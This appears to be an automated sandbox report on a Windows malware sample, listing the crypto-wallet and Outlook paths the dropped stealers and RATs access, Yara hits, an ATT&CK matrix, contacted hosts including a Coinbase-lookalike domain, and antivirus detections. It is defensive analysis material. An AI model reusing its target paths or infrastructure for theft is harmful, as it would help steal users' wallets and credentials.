                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.svchost.exe.6d60000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3950838.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3950838.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6d60000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 20.0.62AB.tmp.build.exe.a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 62AB.tmp.build.exe PID: 7672, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, type: DROPPED
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts231
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      File and Directory Permissions Modification
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Web Service
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts14
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      11
                      Disable or Modify Tools
                      1
                      Credential API Hooking
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Browser Session Hijacking
                      14
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution
                      1
                      Create Account
                      1112
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares3
                      Data from Local System
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      3
                      Scheduled Task/Job
                      3
                      Scheduled Task/Job
                      241
                      Obfuscated Files or Information
                      NTDS158
                      System Information Discovery
                      Distributed Component Object Model11
                      Screen Capture
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      Scheduled Task/Job
                      121
                      Registry Run Keys / Startup Folder
                      121
                      Registry Run Keys / Startup Folder
                      12
                      Software Packing
                      LSA Secrets5101
                      Security Software Discovery
                      SSH1
                      Email Collection
                      4
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media2
                      PowerShell
                      RC ScriptsRC Scripts1
                      Timestomp
                      Cached Domain Credentials271
                      Virtualization/Sandbox Evasion
                      VNC1
                      Credential API Hooking
                      125
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSync3
                      Process Discovery
                      Windows Remote Management1
                      Input Capture
                      Commonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Rootkit
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud Services3
                      Clipboard Data
                      Application Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt221
                      Masquerading
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Modify Registry
                      Network Sniffing1
                      Remote System Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd271
                      Virtualization/Sandbox Evasion
                      Input Capture1
                      System Network Configuration Discovery
                      Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Access Token Manipulation
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1112
                      Process Injection
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1468518 Sample: xj40xovMsm.exe Startdate: 06/07/2024 Architecture: WINDOWS Score: 100 132 pastebin.com 2->132 134 freegeoip.app 2->134 136 14 other IPs or domains 2->136 168 Snort IDS alert for network traffic 2->168 170 Multi AV Scanner detection for domain / URL 2->170 172 Found malware configuration 2->172 178 35 other signatures 2->178 14 xj40xovMsm.exe 6 33 2->14         started        19 svchost.exe 1 1 2->19         started        signatures3 174 Connects to a pastebin service (likely for C&C) 132->174 176 Tries to detect the country of the analysis system (by using the IP) 134->176 process4 dnsIp5 156 auth.xn--conbase-sfb.xyz 188.114.97.3, 443, 49730, 49731 CLOUDFLARENETUS European Union 14->156 124 C:\Users\...\{B955B2CC07A01546086603}.exe, PE32+ 14->124 dropped 126 C:\Users\...\Service_com.adobe.dunamis.exe, PE32+ 14->126 dropped 128 C:\Users\user\AppData\...\Service_Skype.exe, PE32+ 14->128 dropped 130 6 other malicious files 14->130 dropped 160 Creates multiple autostart registry keys 14->160 162 Contains functionality to inject threads in other processes 14->162 164 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->164 166 4 other signatures 14->166 21 relog.exe 14 14->21         started        158 127.0.0.1 unknown unknown 19->158 file6 signatures7 process8 file9 88 C:\Users\user\AppData\...\update[1].pack, PE32+ 21->88 dropped 90 C:\Users\user\AppData\...\update2[1].pack, PE32+ 21->90 dropped 92 C:\Windows\System32\drivers\etc\hosts, ASCII 21->92 dropped 94 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 21->94 dropped 186 Protects its processes via BreakOnTermination flag 21->186 188 Changes memory attributes in foreign processes to executable or writable 21->188 190 Contains functionality to inject threads in other processes 21->190 192 8 other signatures 21->192 25 explorer.exe 20 22 21->25 injected signatures10 process11 dnsIp12 150 hrdc.pk 64.31.40.18, 49742, 80 LIMESTONENETWORKSUS United States 25->150 152 www.westnilebirdingandsafari.com 75.119.203.100, 49760, 80 DREAMHOST-ASUS United States 25->152 154 2 other IPs or domains 25->154 96 C:\Users\user\AppData\...\62AB.tmp.build.exe, PE32 25->96 dropped 98 C:\Users\user\AppData\...\5E16.tmp.aaa.exe, PE32 25->98 dropped 100 C:\Users\user\AppData\...\53A5.tmp.update.exe, PE32 25->100 dropped 102 5 other malicious files 25->102 dropped 206 System process connects to network (likely due to code injection or exploit) 25->206 208 Benign windows process drops PE files 25->208 210 Found many strings related to Crypto-Wallets (likely being stolen) 25->210 212 2 other signatures 25->212 30 5087.tmp.update.exe 25->30         started        34 4336.tmp.Server.exe 25->34         started        37 xj40xovMsm.exe 25->37         started        39 10 other processes 25->39 file13 signatures14 process15 dnsIp16 106 C:\Users\user\AppData\Roaming\svchost.exe, PE32 30->106 dropped 108 C:\Users\user\AppData\...\tmp7CD3.tmp.bat, DOS 30->108 dropped 218 Creates multiple autostart registry keys 30->218 238 2 other signatures 30->238 41 cmd.exe 30->41         started        138 pastebin.com 172.67.19.24, 443, 49895, 49903 CLOUDFLARENETUS United States 34->138 140 icanhazip.com 104.16.184.241, 49879, 49889, 80 CLOUDFLARENETUS United States 34->140 142 api.mylnikov.org 172.67.196.114, 443, 49882, 49891 CLOUDFLARENETUS United States 34->142 110 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 34->110 dropped 112 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 34->112 dropped 114 C:\Users\user\AppData\...\UMMBDNEQBN.xlsx, ASCII 34->114 dropped 122 2 other malicious files 34->122 dropped 220 Multi AV Scanner detection for dropped file 34->220 222 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->222 224 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->224 240 2 other signatures 34->240 44 cmd.exe 34->44         started        46 cmd.exe 34->46         started        116 C:\...\Service_{B955B2CC07A01546086603}.exe, PE32+ 37->116 dropped 118 C:\Users\user\AppData\Local\...\zbi[1].exe, PE32+ 37->118 dropped 226 Writes to foreign memory regions 37->226 228 Modifies the context of a thread in another process (thread injection) 37->228 230 Maps a DLL or memory area into another process 37->230 48 relog.exe 37->48         started        144 api.telegram.org 149.154.167.220, 443, 49751, 49767 TELEGRAMRU United Kingdom 39->144 146 94.232.249.204, 1912, 49777, 49779 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 39->146 148 4 other IPs or domains 39->148 120 C:\ProgramData\KMSAuto\accc.exe, PE32 39->120 dropped 232 Tries to steal Mail credentials (via file / registry access) 39->232 234 Found many strings related to Crypto-Wallets (likely being stolen) 39->234 236 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 39->236 242 4 other signatures 39->242 50 cmd.exe 39->50         started        52 accc.exe 39->52         started        54 relog.exe 39->54         started        56 4 other processes 39->56 file17 signatures18 process19 signatures20 194 Suspicious powershell command line found 41->194 196 Bypasses PowerShell execution policy 41->196 198 Uses netsh to modify the Windows network and firewall settings 41->198 58 svchost.exe 41->58         started        68 2 other processes 41->68 200 Tries to harvest and steal WLAN passwords 44->200 70 4 other processes 44->70 72 3 other processes 46->72 202 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 48->202 74 4 other processes 50->74 204 Multi AV Scanner detection for dropped file 52->204 62 conhost.exe 56->62         started        64 conhost.exe 56->64         started        66 timeout.exe 56->66         started        76 3 other processes 56->76 process21 file22 104 C:\Users\user\AppData\Local\Temp\jqnnpe.exe, PE32 58->104 dropped 214 System process connects to network (likely due to code injection or exploit) 58->214 78 cmd.exe 58->78         started        signatures23 process24 signatures25 216 Suspicious powershell command line found 78->216 81 powershell.exe 78->81         started        83 conhost.exe 78->83         started        process26 process27 85 jqnnpe.exe 81->85         started        signatures28 180 Tries to steal Mail credentials (via file / registry access) 85->180 182 Tries to harvest and steal browser information (history, passwords, etc) 85->182 184 Tries to steal Crypto Currency Wallets 85->184

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      xj40xovMsm.exe71%ReversingLabsWin64.Trojan.Doina
                      xj40xovMsm.exe37%VirustotalBrowse
                      xj40xovMsm.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\ProgramData\KMSAuto\accc.exe88%ReversingLabsByteCode-MSIL.Trojan.ClipBanker
                      C:\ProgramData\KMSAuto\accc.exe56%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack58%ReversingLabsWin64.Trojan.Generic
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack50%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack54%ReversingLabsWin64.Trojan.TinyNuke
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack55%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe88%ReversingLabsByteCode-MSIL.Trojan.ClipBanker
                      C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe56%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe96%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                      C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe74%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe96%ReversingLabsByteCode-MSIL.Backdoor.AsyncRAT
                      C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe74%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe92%ReversingLabsByteCode-MSIL.Infostealer.Echelon
                      C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe66%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      edge-block-www-env.dropbox-dns.com0%VirustotalBrowse
                      igenius.org1%VirustotalBrowse
                      pastebin.com0%VirustotalBrowse
                      api.mylnikov.org3%VirustotalBrowse
                      auth.xn--conbase-sfb.xyz10%VirustotalBrowse
                      freegeoip.app0%VirustotalBrowse
                      api.ipify.org0%VirustotalBrowse
                      ip-api.com0%VirustotalBrowse
                      icanhazip.com0%VirustotalBrowse
                      hrdc.pk3%VirustotalBrowse
                      api.telegram.org2%VirustotalBrowse
